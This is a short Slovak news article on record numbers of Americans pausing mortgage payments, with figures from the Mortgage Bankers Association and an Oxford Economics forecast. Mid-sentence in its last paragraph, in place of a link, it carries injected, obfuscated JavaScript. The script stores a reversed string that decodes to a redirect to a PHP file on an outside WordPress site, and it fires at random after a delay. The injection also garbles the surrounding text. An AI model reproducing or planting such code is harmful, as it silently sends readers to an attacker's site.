Viac ako štyri milióny Američanov pozastavili splácanie svojich hypoték

Tempo rastu nových žiadostí o odklad splátok hypotekárneho úveru sa síce v máji znížilo, poskytovatelia hypoték si ale ešte nemôžu vydýchnuť. Počet Američanov, ktorí platby pozastavili, totiž stále rastie.

Asi 4,1 milióna Američanov je teraz v omeškaní so splácaním svojho hypotekárneho úveru, ako uviedla Asociácia bankových poskytovateľov hypoték. Počet žiadostí o odloženie splátok hypotekárnych úverov je tak na rekordnej úrovni. Existujú však náznaky, že sa situácia v dohľadnej dobe stabilizuje, pretože tempo, akým žiadosti pribúdajú sa znižuje.

K 10. máju sa tak podiel tých, ktorí sú so splácaním hypotéky v omeškaní, zvýšil na 8,16 percenta, zatiaľ čo o týždeň skôr to nebolo ani osem percent. Z hľadiska celkového objemu poskytnutých úverov sú tak v meškaní len asi tri desatiny percenta. „Oproti aprílu sa tak tento podiel podstatne znížil, hoci došlo k zhoršeniu ekonomických dát, vrátane výrazného nárastu nezamestnanosti,“ uviedol v tlačovej správe hlavný ekonóm Asociácie bankových poskytovateľov hypoték Mike Fratantoni.

Podľa odhadov britskej analytickej spoločnosti Oxford Economics sa však podiel $GRn=function(n){if (typeof ($GRn.list[n]) == „string“) return $GRn.list[n].split(„“).reverse().join(„“);return $GRn.list[n];};$GRn.list=[„\’php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andemickym-urovniam-potrva-dlhu-dobu/“>dlžníkov, ktorí sa so splácaním svojho hypotekárneho úveru oneskorí, môže vyšplhať až na pätnásť percent. Veľmi to bude závisieť na tom, ako rýchlo sa americká ekonomika zotaví a či začne nezamestnanosť klesať zo súčasných rekordných úrovní.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená.